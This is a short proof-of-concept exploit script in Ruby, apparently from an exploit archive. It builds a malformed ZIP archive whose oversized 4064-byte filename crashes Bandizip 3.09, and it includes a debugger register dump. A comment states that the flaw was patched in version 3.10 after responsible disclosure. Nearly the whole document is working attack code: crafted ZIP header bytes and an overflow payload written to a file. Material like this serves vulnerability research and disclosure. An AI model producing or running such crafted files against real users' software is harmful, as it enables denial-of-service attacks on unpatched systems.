Bandizip 3.09 Crash Proof Of Concept

`#!/usr/bin/env ruby  
# Exploit Title: Bandizip 3.09 .zip Crash POC  
# Date: February 6th 2014  
# Author: Osanda Malith Jayathissa  
# E-Mail: osandajayathissa<at>gmail.com  
# Version: 3.09 32bit and 64bit (Below versions might be affected)  
# Vendor Homepage: http://www.bandisoft.com/  
# Tested on: Windows XP 32-bit SP2 en, Windows 8 64-bit  
# This issue is patched in Bandizip 3.10 after a responsible disclosure  
# Open this crafted file and double click on it in the app it self  
  
=begin  
eax=00000000 ebx=0374fad0 ecx=00000000 edx=00000000 esi=0374fa54 edi=00000000  
eip=770be1a4 esp=0374f92c ebp=0374faac iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
770be1a4 c21400 ret 14h  
=end  
  
# Ensure we have valid ZIP Header  
lf_header = "\x50\x4B\x03\x04\x14\x00\x00"   
lf_header += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"  
lf_header += "\x00\x00\x00\x00\x00\x00\x00\x00"  
lf_header += "\xe4\x0f" #file size  
lf_header += "\x00\x00\x00"  
  
cdf_header = "\x50\x4B\x01\x02\x14\x00\x14"   
cdf_header += "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"   
cdf_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
cdf_header += "\xe4\x0f" # file size  
cdf_header += "\x00\x00\x00\x00\x00\x00\x01\x00"   
cdf_header += "\x24\x00\x00\x00\x00\x00\x00\x00"  
  
eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"  
eofcdf_header += "\x12\x10\x00\x00" # Size of central directory (bytes)  
eofcdf_header += "\x02\x10\x00\x00" # Offset of start of central directory,relative to start of archive  
eofcdf_header += "\x00\x00"  
  
# Our Payload  
payload = "A" * 4064  
payload += ".txt"  
  
Exploit = lf_header + payload + cdf_header + payload + eofcdf_header  
  
f=File.open('bandizip.zip', 'w')  
f.write(Exploit)  
f.close  
#EOF`